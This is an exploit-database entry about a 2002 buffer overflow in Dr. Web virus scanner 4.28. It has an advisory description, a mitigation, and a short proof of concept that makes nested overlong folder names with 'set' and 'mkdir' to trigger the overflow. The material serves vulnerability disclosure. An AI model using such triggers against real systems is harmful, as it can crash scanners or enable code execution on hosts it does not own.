header-logo
Suggest Exploit
vendor:
Dr. Web Virus Scanner
by:
SecurityFocus
7.5
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: Dr. Web Virus Scanner
Affected Version From: 4.28
Affected Version To: 4.28
Patch Exists: YES
Related CWE: N/A
CPE: Dr.Web
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2002

Dr. Web Virus Scanner Buffer Overflow Vulnerability

A buffer overflow vulnerability has been reported for Dr. Web virus scanner. The vulnerability is due to insufficient bounds checking when processing folder names. An attacker is able to exploit this vulnerability by creating a malicious folder name of excessive length. When a virus scan is initiated, processing the folder name will trigger the buffer overflow condition. Successful exploitation of this issue will result in the execution of attacker-supplied code with the privileges of the Dr. Web virus scanner process.

Mitigation:

Upgrade to the latest version of Dr. Web virus scanner
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/7022/info

A buffer overflow vulnerability has been reported for Dr. Web virus scanner. The vulnerability is due to insufficient bounds checking when processing folder names.

An attacker is able to exploit this vulnerability by creating a malicious folder name of excessive length. When a virus scan is initiated, processing the folder name will trigger the buffer overflow condition. Successful exploitation of this issue will result in the execution of attacker-supplied code with the privileges of the Dr. Web virus scanner process.

This vulnerability has been reported for Dr.Web version 4.28 and earlier. 

set a= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAA
set b= BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBB

mkdir /$a
mkdir /$a/$b

Or:

SET A = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAA
SET B = BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBB

mkdir \\?\c:\%A%
mkdir \\?\c:\%B%

Navigation

Suggest Exploit

Services By CQR